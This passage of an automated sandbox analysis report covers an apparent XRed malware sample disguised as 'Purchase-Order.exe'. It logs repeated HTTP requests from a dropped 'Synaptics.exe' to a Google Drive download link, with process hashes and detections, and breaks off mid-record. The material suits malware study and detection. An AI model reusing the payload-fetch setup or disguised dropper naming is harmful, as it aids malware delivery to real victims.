                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-1gDNlC2C9nCU5Opc9LnBtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              141192.168.2.449939142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:35 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              142192.168.2.449940142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              143192.168.2.449941142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              144192.168.2.449943142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:36 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-AO7Spp35_ijSBrz0GP3iLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              145192.168.2.449945142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:36 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-trVBzAUj2CGCJVlVtGZkbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              146192.168.2.449944142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:37 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7f2R-Ln9sxCZ1V9qdd3pGbqz3PVnqL5IjxmlIxNb0-EorCIcjgVNlaLnECtvNkq9-eE47CCFY
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:36 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ilGmHQ_vIBhYqmtMzTsWyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:37 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:37 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 53 66 69 6e 4d 64 68 69 67 53 4f 41 78 68 70 2d 74 73 31 42 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="GSfinMdhigSOAxhp-ts1Bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:37 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              147192.168.2.449949142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:37 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-c1X2uq7kkSWviqHBWmIZ-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              148192.168.2.449947142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:37 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:38 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4NCBMgi7G-4LAn1MyG1WMoMjoEXoulmAPzDROhJbf3LflGGwwW4pTHD8BcWVGtasQD
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:37 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-O5s2LizMmCAOpXAAe0lsqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:38 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:38 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 73 48 4c 78 53 64 61 42 30 64 4e 4a 55 67 39 78 75 55 66 45 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="MsHLxSdaB0dNJUg9xuUfEw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:38 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              149192.168.2.449948142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:37 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-H58QWWSBHHAp1czq6LyJDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:05:35:45
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\Desktop\Purchase-Order.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Purchase-Order.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:2'205'184 bytes
                                                                                                              MD5 hash:63A057389438A0B287D32E31149D6AD4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:1
                                                                                                              Start time:05:35:45
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\Desktop\._cache_Purchase-Order.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\._cache_Purchase-Order.exe"
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:1'433'600 bytes
                                                                                                              MD5 hash:5C99BB8A6972F6FCE154D00AA56F2F9D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 58%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Target ID:2
                                                                                                              Start time:05:35:46
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                              Imagebase:0x400000
                                                                                                              File size:771'584 bytes
                                                                                                              MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 92%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Target ID:3
                                                                                                              Start time:05:35:46
                                                                                                              Start date:30/12/2024
